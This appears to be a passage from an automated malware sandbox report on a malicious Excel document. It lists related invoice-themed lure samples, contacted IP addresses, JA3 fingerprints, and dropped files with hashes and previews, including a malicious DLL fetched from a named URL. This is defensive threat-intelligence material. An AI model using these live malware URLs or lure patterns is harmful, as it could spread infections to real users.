                                                                  NKsplucdAu.exeGet hashmaliciousBrowse
                                                                  • 217.172.179.54
                                                                  lZVNh1BPxm.exeGet hashmaliciousBrowse
                                                                  • 217.172.179.54
                                                                  qG5E4q8Cv5.exeGet hashmaliciousBrowse
                                                                  • 217.172.179.54
                                                                  SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exeGet hashmaliciousBrowse
                                                                  • 217.172.179.54
                                                                  990109.exeGet hashmaliciousBrowse
                                                                  • 87.230.93.218
                                                                  og0gax.dllGet hashmaliciousBrowse
                                                                  • 62.138.14.216
                                                                  M1OrQwls8C.dllGet hashmaliciousBrowse
                                                                  • 62.138.14.216
                                                                  https://installforge.net/downloads/?i=IFSetupGet hashmaliciousBrowse
                                                                  • 5.175.14.17
                                                                  SecuriteInfo.com.Trojan.Dridex.735.5073.dllGet hashmaliciousBrowse
                                                                  • 85.25.144.36
                                                                  sample.exeGet hashmaliciousBrowse
                                                                  • 134.119.76.46
                                                                  1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                  • 85.25.144.36
                                                                  1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                  • 85.25.144.36
                                                                  1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                  • 85.25.144.36
                                                                  1-Total New Invoices Monday Dec 14 2020.xlsmGet hashmaliciousBrowse
                                                                  • 85.25.144.36
                                                                  GODADDY-AMSDEorder no. 3643.exeGet hashmaliciousBrowse
                                                                  • 160.153.133.87
                                                                  W08347.exeGet hashmaliciousBrowse
                                                                  • 160.153.128.42
                                                                  https://northernprepsquad.uk/wp-content/C2SgD76AFgrcENck0bAOmz8LMoQDQN9C8XlsS16BNPCVrzJBNs/Get hashmaliciousBrowse
                                                                  • 160.153.138.177
                                                                  order (2021.01.05).exeGet hashmaliciousBrowse
                                                                  • 160.153.136.3
                                                                  Nuevo pedido.exeGet hashmaliciousBrowse
                                                                  • 160.153.136.3
                                                                  Rfq 214871_TAWI Catalog.exeGet hashmaliciousBrowse
                                                                  • 160.153.136.3
                                                                  https://6354mortgagestammp.com/Get hashmaliciousBrowse
                                                                  • 160.153.136.3
                                                                  SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                                                  • 160.153.133.212
                                                                  rib.exeGet hashmaliciousBrowse
                                                                  • 160.153.136.3
                                                                  payment copy.exeGet hashmaliciousBrowse
                                                                  • 160.153.136.3
                                                                  TN22020000560175.exeGet hashmaliciousBrowse
                                                                  • 160.153.133.87
                                                                  V-0093717.docGet hashmaliciousBrowse
                                                                  • 160.153.138.71
                                                                  Archivo.docGet hashmaliciousBrowse
                                                                  • 160.153.137.170
                                                                  P.O-45.exeGet hashmaliciousBrowse
                                                                  • 160.153.136.3
                                                                  Rfq_Catalog.exeGet hashmaliciousBrowse
                                                                  • 160.153.136.3
                                                                  AWBInvoice INA101970.exeGet hashmaliciousBrowse
                                                                  • 160.153.136.3
                                                                  http://omilen.cl/wordpress/o5MLV1qQlaZNrKSU1SyA/Get hashmaliciousBrowse
                                                                  • 160.153.137.14
                                                                  wspaxx.exeGet hashmaliciousBrowse
                                                                  • 160.153.138.177
                                                                  inv.exeGet hashmaliciousBrowse
                                                                  • 160.153.136.3
                                                                  court_case_information-58.xlsmGet hashmaliciousBrowse
                                                                  • 160.153.209.23
                                                                  SENTIANLhy9x6wzip.dllGet hashmaliciousBrowse
                                                                  • 5.100.228.233
                                                                  INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                  • 5.100.228.233
                                                                  jufk0vrar.dllGet hashmaliciousBrowse
                                                                  • 5.100.228.233
                                                                  anthon.exeGet hashmaliciousBrowse
                                                                  • 145.131.21.142
                                                                  baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                  • 91.216.141.46
                                                                  p8LV1eVFyO.exeGet hashmaliciousBrowse
                                                                  • 91.216.141.46
                                                                  IQtvZjIdhN.exeGet hashmaliciousBrowse
                                                                  • 91.216.141.46
                                                                  148wWoi8vI.exeGet hashmaliciousBrowse
                                                                  • 91.216.141.46
                                                                  plusnew.exeGet hashmaliciousBrowse
                                                                  • 145.131.29.142
                                                                  List-20200731-79226.docGet hashmaliciousBrowse
                                                                  • 5.100.228.16
                                                                  LIST-20200731-88494.docGet hashmaliciousBrowse
                                                                  • 5.100.228.16
                                                                  Rep_20200731.docGet hashmaliciousBrowse
                                                                  • 5.100.228.16

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  eb88d0b3e1961a0562f006e5ce2a0b87INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  Document74269.xlsGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  Document74269.xlsGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  1 Total New Invoices-Monday December 14 2020.xlsGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  1-Total New Invoices Monday Dec 14 2020.xlsmGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  SecuriteInfo.com.Heur.15645.xlsmGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  Statement_1857_of_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  Statement_9505_of_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  MSC printouts of outstanding as of 73221_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  Invoice.29002611.docGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  MSC printouts of outstanding as of 64338_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  MSC printouts of outstanding as of 41705_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  printouts of outstanding as of 27212_12_11_2020.xlsmGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  Inv.Docum.559488870.docGet hashmaliciousBrowse
                                                                  • 77.220.64.37
                                                                  Inv.Docum_323925335.docGet hashmaliciousBrowse
                                                                  • 77.220.64.37

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                  Process:C:\Windows\System32\DWWIN.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):914
                                                                  Entropy (8bit):7.367371959019618
                                                                  Encrypted:false
                                                                  SSDEEP:24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
                                                                  MD5:E4A68AC854AC5242460AFD72481B2A44
                                                                  SHA1:DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
                                                                  SHA-256:CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
                                                                  SHA-512:5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: 0...0..v........:......(d.....0...*.H........0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20...130801120000Z..380115120000Z0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20.."0...*.H.............0.........7.4.{k.h..Ju.F.!.....T......:..<z...k.-.^.$D.b.~..~.Tu ..P..c.l0.............7...CN.{,.../..:...%.k.`.`.O!I..g..a......2k..W.].......I.5-..Im.w..IK..U......#.LmE.....0..LU.'JW.|...s...J...P.......!..........g(.s..=Fv...!4M..E..I.....3.).......B0@0...U.......0....0...U...........0...U......N"T ....n..........90...*.H.............`g(.o.Hc.1..g..}<.J...+.._sw*2.9.gB.#.Eg5....a.4.. L....5.v..B..D...6t$Z.l..Y5..I....G*=./.\... ._SF..h...0.>1.....>5.._..pPpGA.W.N......./.%.u...o..Aq..*.O. U...E..D..2...SF.,...".K..E....X..}R..YC....&.o....7}.....w_v.<..]V[..fn.57.2.
                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                  Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                  File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                  Category:dropped
                                                                  Size (bytes):58936
                                                                  Entropy (8bit):7.994797855729196
                                                                  Encrypted:true
                                                                  SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                  MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                  SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                  SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                  SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                  Process:C:\Windows\System32\DWWIN.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):252
                                                                  Entropy (8bit):3.0843541827899497
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKftpLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:jLutWOxSW0zeYrsMlU/
                                                                  MD5:FCEAF34577B506872666E4E54BC497F0
                                                                  SHA1:625C0E374755F23B8DDF9798576CB1BFD359A778
                                                                  SHA-256:3F615DD1F226B588104631B0F8A9C3FCDEA098E0FA958D996C429BDB39084F1F
                                                                  SHA-512:43E379C566166B75214CBE738BB6831C9D458567723B4D8C49FFB14EB21D20813B796E75D90CAF39B22B27B842C512C403A713DD532D7FFE05E8E2C450634303
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: p...... ....j...qy./}...(....................................................... ............n...u..................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.G.l.o.b.a.l.R.o.o.t.G.2...c.r.t...".5.a.2.8.6.4.1.7.-.3.9.2."...
                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                  Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):326
                                                                  Entropy (8bit):3.123186963792904
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKRCzZwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:YzWkPlE99SNxAhUegeT2
                                                                  MD5:AB3C4E3D29F9B541982FE4DDDA51A7C1
                                                                  SHA1:D4795710EB3E44FEF18A66E3AA2E934B30DC8584
                                                                  SHA-256:F660F4B09CD32E15A372B8C169DCA42CA53D11D54D7282C9C138E82A413DB4CC
                                                                  SHA-512:2F219517514D48B6DB7E98377A736252F7DEB896E7DC03D368498CC64321D8168C8D3F189362B568637C32B3AF04A0C1F4FDC6400222B4462B0E87BC730F1D9F
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: p...... ........,#.}...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zip
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:downloaded
                                                                  Size (bytes):318976
                                                                  Entropy (8bit):7.117716571043564
                                                                  Encrypted:false
                                                                  SSDEEP:6144:CH9O040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwN:+9O02Srnh0qEJC+Y218jdN
                                                                  MD5:153526D29EC2007BAB82E802476A4DE8
                                                                  SHA1:6AD4255289C294C1FB40D9B016BF9A3910ACD2D7
                                                                  SHA-256:960A1E2B0409907409403684B842DDCCC1BB3369EFAF5881FEA9D1DA51599717
                                                                  SHA-512:87CC56F173494817BC097959D6288880971045DF3BE3C881F62DD72C045EFA55A974FA2A6538518E62487374ABDC060585FC32C53565BE686516DEF39BBADC7E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 33%
                                                                  Reputation:low
                                                                  IE Cache URL:http://inmindppe.com/eb3kd1le.zip
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Qf._...........!...2.z...`.......&.......@...............................@..........................................................|....................0..(....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2......p.......2..............@..@.data...H............4..............@....text4...R.......T...P.............. ..@.rsrc...|........0..................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\28E159F7.emf
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                  Category:dropped
                                                                  Size (bytes):1408
                                                                  Entropy (8bit):2.270567557934206
                                                                  Encrypted:false
                                                                  SSDEEP:12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
                                                                  MD5:40550DC2F9D56285FA529159B8F2C6A5
                                                                  SHA1:DD81D41D283D2881BEC77E00D773C7E8C0744DA3
                                                                  SHA-256:DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
                                                                  SHA-512:FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: ....l................................... EMF........).......................`...1........................|..F...........GDIC........L0.U......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A668FB8C.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 363 x 234, 8-bit colormap, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):2653
                                                                  Entropy (8bit):7.818766151665501
                                                                  Encrypted:false
                                                                  SSDEEP:48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x
                                                                  MD5:30D3FFA1E30B519FD9B1B839CC65C7BE
                                                                  SHA1:1EB0F0E160FF7440223A7FE46F08B503F03D3AFB
                                                                  SHA-256:89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC
                                                                  SHA-512:88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: .PNG........IHDR...k.........S.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.........KIK..................IDATx...b.0.E-......`.Y..~f.$.h...,..H..CLg.x<.h..k..k..k..k..k..k..k........:....$F...........E.....t.c?.~...q?.....!F....)<#$.l.......`..f.......;.......D]M.~..s.....h.}`.&{..X2.6.....s.;3>..o....0zn...])..8..;..rA..6..Xn"R..a.Bw..M....tw..mE.w....>....].._v...z...H.y..8{)Z...gu.C~.3...>]o..>_.F/....._7nt...c...n..lu..g..@......I...=.........?.9...."..Rc..b..lf.f..l.....#4...Fw.A{...&N.Z.'..2.;.?.h.|..eZf..`..`..`..`......O..m.>n.-fS.........R...q.....F..D.....w...e..x.H.?.C........;.o!.)....@G..y..EY...5.>...'.}..4(..Aj)d.Pk....7vG........,G..RZ.#F...K.<.....'j...^r.(......"......FHN.D4.j.y..wJ_...H2.....lN....?.V?...z.K.......M..F... ..t...053..:..0.~.S-.30..'...Q..et..=...5.q.Ko..Y#...H.~...C..CLi.83..6_..B.DC..>?.]..fGo..X0}C.|.@B..AJ.s.x...n..[.#WE....F.gv..i}..f}.....qG...G.O4....w6.x.L.J.......^._o:Za}..{.x.....F
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_EXCEL.EXE_6f227b18f49da44a2d1889aa10939f535bdc_09e181be\Report.wer
                                                                  Process:C:\Windows\System32\DWWIN.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):15904
                                                                  Entropy (8bit):3.720313537860349
                                                                  Encrypted:false
                                                                  SSDEEP:96:QzuVubJBakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiF:y5cBKzFCEuhTlyZVaP+VaJa5GG
                                                                  MD5:162DAD3710B5D9BD6CA1D1918DE9ACEE
                                                                  SHA1:58DD83FD42993368D8A7B145263A1DEB9A0124C8
                                                                  SHA-256:1816FBE94EEC773203E2B1AC3F814A96301F105B4C0A5893E0F6DDFD6746E2CB
                                                                  SHA-512:E3D6B83B8075F419AD7D239303E73EA841E990F3998A9603EC195EE65C64207B7F8B7439D253B643F4F5F9F5317E17CD350F917E279B2E581DCC4DFBCD338F90
                                                                  Malicious:false
                                                                  Preview: V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.4.8.8.6.3.2.4.0.3.3.8.8.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.4.8.8.6.3.4.0.9.9.1.1.1.2.7.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.6.4.d.9.4.b.-.5.4.7.0.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.6.4.d.9.4.a.-.5.4.7.0.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.I.d.=.3.7.0.1.1.5.9.2.6.1.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.T.a.b.l.e.=.3.8.0.7.0.7.5.2.5.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .N.a.m.e.....S.i.g.[.0.]...V.a.l.u.e.=.E.X.C.E.L...E.X.E.....S.i.g.[.1.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .V.e.r.s.i.o.n.....S.i.g.[.1.]...V.a.l.u.e.=.1.4...0...7.0.1.5...1.0.0.0.....S.i.g.[.2.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .T.i.m.e.s.t.a.m.p.....S.i.g.[.2.]...V.a.l.u.e.=.5.1.c.c.a.7.c.d.....S.i.g.[.3.]...N.a.m.
                                                                  C:\Users\user\AppData\Local\Temp\6AEE0000
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):58660
                                                                  Entropy (8bit):7.8593434784067115
                                                                  Encrypted:false
                                                                  SSDEEP:1536:hpnu8RzggbLmCf6646CIKqQgLhDwwyL4FsLNFqx6:hp1rmCM2vQgLhTI4F+M6
                                                                  MD5:F5C166F980C776309079B5DF6D68F4A2
                                                                  SHA1:2B3703DE013B1A2992048D1C593593CB89FB1306
                                                                  SHA-256:0340604196275F04E36CADAB97922B5D2ABF66F231E140EF029577F7103005CF
                                                                  SHA-512:C63CB5FCCDEBB40E16FF778B8800159A775D2857A8FA288019F8AEABB95767710CAAFD8D6671383DAD911118D0B89D04493055C5B78AF930BD42BCC2D64E41B0
                                                                  Malicious:false
                                                                  Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\995379.cvr
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1388
                                                                  Entropy (8bit):3.1384556638098253
                                                                  Encrypted:false
                                                                  SSDEEP:24:RHLll/EzmvsEJFo/B2lEAcul/TvXk5okHE/fVf4kHxOmP4t0IskWNyFETKn5AA+t:RHLll/znop2KIXK03N9RzIDkKnI
                                                                  MD5:6FAD8DEA285CF3CA39A6C7C0E1BB42E5
                                                                  SHA1:4F2B061E70A19AE0A5DE4D2FF8F6853560A16584
                                                                  SHA-256:0F079F2C6B9EB73F23E1A029D1DF64B9A3362E34667510E2F73D46D3E52CE119
                                                                  SHA-512:7611B15EB42A6DF1B4BE0423CF381BD8D2E93A2C2FE38FDFE81180B81A040619ED207A2167CB730EEB6057B80F27FBBA884B5E1CA79FC0D2EE55167A10007AF2
                                                                  Malicious:false
                                                                  Preview: MSQMx........KR.................g........................~..}.....J$}................................................................................\......EXCE........................................5...g.......;...........<...........A...........l...........................z...H.......................H...............................................................................................h.......................................b...........N....................A..C...........F...........Q...........W.......'!........... ......................m...........m...........m...........m...+...........0...........:...........;...............................................................................8...........8.... ......j...:!..........n"..........."....... ..."....... ..."....... ..."....... ..."....... ..."....... ..7#..........?...E...8.......E...8...............................<...B...........\ ../....................A../.......................$...$...........\ ..n370.....A..
                                                                  C:\Users\user\AppData\Local\Temp\Cab4960.tmp
                                                                  Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                  File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                  Category:dropped
                                                                  Size (bytes):58936
                                                                  Entropy (8bit):7.994797855729196
                                                                  Encrypted:true
                                                                  SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                  MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                  SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                  SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                  SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                  Malicious:false
                                                                  Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                  C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):241332
                                                                  Entropy (8bit):4.206862557487649
                                                                  Encrypted:false
                                                                  SSDEEP:1536:cGqLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cPNNSk8DtKBrpb2vxrOpprf/nVq
                                                                  MD5:D31AAE35E4371A0F24FFAEE8B0B3FE31
                                                                  SHA1:50E1D0505DFAE23EEEADC3A3818306F7E28FE8EA
                                                                  SHA-256:E64A445B442AC69758162DBA057BB794BCF8B9C10A6737833EBF262C5B2FA616
                                                                  SHA-512:5B234DA5A15109B748CBE347FB93FE9CEF0D1C503D9C5CE3AC27356419CF5442C4259EECA34497C22A6E668923C9BE7D73F8FF3F046CBECC9497D25FC6CE2059
                                                                  Malicious:false
                                                                  Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\Tar4961.tmp
                                                                  Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):152533
                                                                  Entropy (8bit):6.31602258454967
                                                                  Encrypted:false
                                                                  SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                  MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                  SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                  SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
